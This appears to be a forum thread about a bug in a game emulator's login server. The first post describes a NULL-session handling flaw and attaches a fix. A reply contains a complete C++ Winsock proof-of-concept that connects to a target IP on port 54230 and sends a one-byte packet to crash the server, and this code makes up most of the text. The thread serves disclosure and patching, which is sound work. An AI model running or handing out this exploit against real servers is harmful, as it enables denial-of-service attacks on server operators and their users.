Bug Report: http://bugs.dspt.info/show_bug.cgi?id=429
Bug is a result of the login server checking for NULL sessions then attemting to create a session out of the connection. However the check is for a specific packet in the login process which leaves the null session allowed to fall through into the underlying code.
To fix, a second check for NULL after the first handling will prevent the problem from happening.
Small / simple patch to fix the problem.
Login Server Bugfix (Exploit Fix)
Login Server Bugfix (Exploit Fix)
- Attachments
-
lobby.cpp.patch- (312 Bytes) Downloaded 157 times
Re: Login Server Bugfix (Exploit Fix)
Just as a heads up, this patch is also fixing an exploit that can be abused to crash the login server easily.
Here is a proof of concept that can abuse this to crash the login server, prior to this patch being applied:
Here is a proof of concept that can abuse this to crash the login server, prior to this patch being applied:
Code: Select all
/**
* DSP Crash Proof-of-Concept
* (c) 2012-2013 atom0s [atom0s@live.com]
*
* dspcrash_0002!atom0s -- Login server crash exploit.
*
*/
#pragma comment( lib, "Ws2_32.lib" )
#include <WinSock2.h>
#include <Windows.h>
#include <iostream>
int __cdecl main( int argc, char* argv[] )
{
std::cout << "========================================================" << std::endl;
std::cout << "[ DSP Crash Proof-of-Concept (Login Server Crash) ]" << std::endl;
std::cout << "[ by atom0s (c) 2013 ]" << std::endl;
std::cout << "========================================================" << std::endl;
// Validate we have two arguments..
if (argc < 2)
{
std::cout << "[!] Invalid argument count!" << std::endl;
std::cout << "[!] dspcrash_0002!atom0s.exe [ip_address]" << std::endl;
return 0;
}
// Initialize winsock..
WSADATA wsaData = { 0 };
if (WSAStartup( MAKEWORD( 2, 2 ), &wsaData ))
{
std::cout << "[!] Failed to initialize Winsock!" << std::endl;
return ERROR_SUCCESS;
}
std::cout << "[!] Winsock initialized!" << std::endl;
// Create the socket..
auto sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if (sock == NULL)
{
std::cout << "[!] Failed to create socket." << std::endl;
WSACleanup();
return ERROR_SUCCESS;
}
std::cout << "[!] Socket created!" << std::endl;
// Prepare socket..
struct sockaddr_in saddr = { 0 };
memset( &saddr, 0x00, sizeof( sockaddr_in ) );
saddr.sin_addr.S_un.S_addr = inet_addr( argv[1] );
saddr.sin_family = AF_INET;
saddr.sin_port = htons( 54230 );
// Connect to the target..
if (connect( sock, (struct sockaddr*)&saddr, sizeof( saddr ) ))
{
std::cout << "[!] Failed to connect to target server!" << std::endl;
closesocket( sock );
WSACleanup();
return ERROR_SUCCESS;
}
// Send the exploit packet..
unsigned char packet[] = { 0x00, 0x00 };
if (send( sock, (const char*)packet, 1, 0 ) != 1)
{
std::cout << "[!] Failed to send exploit packet!" << std::endl;
closesocket( sock );
WSACleanup();
return ERROR_SUCCESS;
}
std::cout << "[!] Packet was sent to target server!" << std::endl;
std::cout << "[!] Exploit complete!" << std::endl;
// Cleanup and return..
closesocket( sock );
WSACleanup();
// Suspend for visibility..
if (argc == 3) Sleep( 5000 );
return ERROR_SUCCESS;
}
